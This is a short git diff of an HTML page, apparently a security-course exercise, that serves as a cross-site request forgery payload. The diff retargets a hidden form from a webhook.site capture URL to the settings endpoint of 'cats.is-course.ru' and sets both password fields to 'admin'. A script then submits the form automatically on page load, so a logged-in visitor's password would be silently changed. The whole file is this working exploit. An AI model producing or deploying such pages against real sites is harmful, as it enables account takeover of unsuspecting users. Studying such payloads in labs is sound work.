--- a/index.html
+++ b/index.html
@@ -6,9 +6,9 @@
     <title>Auto Submit Form</title>
 </head>
 <body>
-    <form action="https://webhook.site/4aa2fda7-ec6c-4b07-903f-9f09e628ea22" method="POST">
-        <input name="password" value="345">
-        <input name="confirm-password" value="345">
+    <form action="https://cats.is-course.ru/settings" method="POST">
+        <input name="password" value="admin">
+        <input name="confirm-password" value="admin">
     </form>
     <script>
         document.forms[0].submit();
